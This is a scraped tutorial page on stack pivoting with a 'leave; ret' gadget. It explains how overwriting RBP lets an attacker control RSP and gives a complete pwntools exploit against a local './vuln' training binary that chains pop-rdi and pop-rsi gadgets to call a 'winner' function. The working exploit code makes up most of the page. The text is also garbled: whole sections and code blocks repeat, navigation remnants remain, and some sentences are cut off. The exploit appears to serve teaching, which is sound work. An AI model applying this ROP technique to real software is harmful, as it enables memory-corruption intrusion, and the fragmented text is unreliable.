1 of 1

leave

Using leave; ret to stack pivot

Exploitation

By calling leave; ret twice, as described, this happens:

By controlling the value popped into RBP, we can control RSP.

Gadgets

As before, but with a difference:

Testing the leave

I won't bother stepping through it again - if you want that, check out the .

Essentially, that pops buffer into RSP (as described previously).

Full Payload

You might be tempted to just chuck the payload into the buffer and boom, RSP points there, but you can't quite - as with the previous approach, there is a pop instruction that needs to be accounted for - again, remember leave is

So once you overwrite RSP, you still need to give a value for the pop rbp.

Final Exploit

leave

Using leave; ret to stack pivot

Exploitation

By calling leave; ret twice, as described, this happens:

mov rsp, rbp
pop rbp
mov rsp, rbp
pop rbp

By controlling the value popped into RBP, we can control RSP.

Gadgets

As before, but with a difference:

Testing the leave

I won't bother stepping through it again - if you want that, check out the .

Essentially, that pops buffer into RSP (as described previously).

Full Payload

So once you overwrite RSP, you still need to give a value for the pop rbp.

Final Exploit

payload = flat(
    0x0,               # account for final "pop rbp"
    POP_RDI,
    0xdeadbeef,
    POP_RSI_R15,
    0xdeadc0de,
    0x0,               # r15
    elf.sym['winner']
)

payload = payload.ljust(96, b'A')     # pad to 96 (just get to RBP)

payload += flat(
    buffer,
    LEAVE_RET
)

from pwn import *

elf = context.binary = ELF('./vuln')
p = process()

p.recvuntil('to: ')
buffer = int(p.recvline(), 16)
log.success(f'Buffer: {hex(buffer)}')

LEAVE_RET = 0x40117c
POP_RDI = 0x40122b
POP_RSI_R15 = 0x401229

payload = flat(
    0x0,               # rbp
    POP_RDI,
    0xdeadbeef,
    POP_RSI_R15,
    0xdeadc0de,
    0x0,
    elf.sym['winner']
)

payload = payload.ljust(96, b'A')     # pad to 96 (just get to RBP)

payload += flat(
    buffer,
    LEAVE_RET
)

pause()
p.sendline(payload)
print(p.recvline())

payload = flat(
    0x0,               # account for final "pop rbp"
    POP_RDI,
    0xdeadbeef,
    POP_RSI_R15,
    0xdeadc0de,
    0x0,               # r15
    elf.sym['winner']
)

payload = payload.ljust(96, b'A')     # pad to 96 (just get to RBP)

payload += flat(
    buffer,
    LEAVE_RET
)

from pwn import *

elf = context.binary = ELF('./vuln')
p = process()

p.recvuntil('to: ')
buffer = int(p.recvline(), 16)
log.success(f'Buffer: {hex(buffer)}')

LEAVE_RET = 0x40117c
POP_RDI = 0x40122b
POP_RSI_R15 = 0x401229

payload = flat(
    0x0,               # rbp
    POP_RDI,
    0xdeadbeef,
    POP_RSI_R15,
    0xdeadc0de,
    0x0,
    elf.sym['winner']
)

payload = payload.ljust(96, b'A')     # pad to 96 (just get to RBP)

payload += flat(
    buffer,
    LEAVE_RET
)

pause()
p.sendline(payload)
print(p.recvline())

leave

hashtagExploitation

hashtagGadgets

hashtagTesting the leave

hashtagFull Payload

hashtagFinal Exploit

leave

hashtagExploitation

hashtagGadgets

hashtagTesting the leave

hashtagFull Payload

hashtagFinal Exploit

Exploitation

Gadgets

Testing the leave

Full Payload

Final Exploit

Exploitation

Gadgets

Testing the leave

Full Payload

Final Exploit